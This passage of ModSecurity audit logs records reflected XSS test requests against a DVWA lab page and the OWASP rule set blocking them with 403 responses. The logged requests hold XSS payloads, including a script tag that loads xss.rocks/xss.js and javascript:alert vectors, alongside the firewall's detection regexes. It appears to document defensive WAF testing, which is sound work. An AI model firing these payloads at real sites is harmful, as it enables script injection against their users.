\"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT SRC=http://xss.rocks/xss.js> found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <SCRIPT found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 23)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":637,"p2":4001,"p3":0,"p4":0,"p5":233,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:28:45 --0400","transaction_id":"WRc0PX8AAQEAAAkYuE4AAAAD","remote_address":"192.168.75.145","remote_port":56778,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"192\"] [id \"941140\"] [rev \"3\"] [msg \"XSS Filter - Category 4: Javascript URI Vector\"] [data \"Matched Data: =\\x22javascript: found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <IMG  found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"300\"] [id \"941170\"] [rev \"3\"] [msg \"NoScript XSS InjectionChecker: Attribute Injection\"] [data \"Matched Data: \\x22javascript:alert( found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i:(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\\\\t]|(&((#x?0*(9|(13)|( ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"428\"] [id \"941210\"] [rev \"3\"] [msg \"IE XSS Filters - Attack Detected.\"] [data \"Matched Data: javascript:a found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 33)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=30,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): IE XSS Filters - Attack Detected.\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\\\\\\\\\\\\\b[^>]*?>[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?|(?:=|U\\\\\\\\\\\\\\\\s*?R\\\\\\\\\\\\\\\\s*?L\\\\\\\\\\\\\\\\s*?\\\\\\\\\\\\\\\\()\\\\\\\\\\\\\\\\s*?[^>]*?\\\\\\\\\\\\\\\\s*?S\\\\\\\\\\\\\\\\s*?C\\\\\\\\\\\\\\\\s*?R\\\\\\\\\\\\\\\\s*?I\\\\\\\\\\\\\\\\s*?P\\\\\\\\\\\\\\\\s*?T\\\\\\\\\\\\\\\\s*?:)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"192\"] [id \"941140\"] [rev \"3\"] [msg \"XSS Filter - Category 4: Javascript URI Vector\"] [data \"Matched Data: =\\\\\\\\x22javascript: found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <IMG  found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:\\\\\\\\\\\\\\\\W|^)(?:javascript:(?:[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]+[=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\.<]|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?(?:\\\\\\\\\\\\\\\\bname\\\\\\\\\\\\\\\\b|\\\\\\\\\\\\\\\\[ux]\\\\\\\\\\\\\\\\d))|data:(?:(?:[a-z]\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\w+-]+\\\\\\\\\\\\\\\\w)?[;,]|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?;[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?\\\\\\\\\\\\\\\\b(?:base64|charset=)|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?,[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?<[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?>))|@\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*? ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"300\"] [id \"941170\"] [rev \"3\"] [msg \"NoScript XSS InjectionChecker: Attribute Injection\"] [data \"Matched Data: \\\\\\\\x22javascript:alert( found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i:(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|( ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"428\"] [id \"941210\"] [rev \"3\"] [msg \"IE XSS Filters - Attack Detected.\"] [data \"Matched Data: javascript:a found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 33)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=30,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): IE XSS Filters - Attack Detected.\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":613,"p2":3997,"p3":0,"p4":0,"p5":330,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:04 --0400","transaction_id":"WRc0UH8AAQEAAAkZ0BIAAAAE","remote_address":"192.168.75.145","remote_port":56780,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 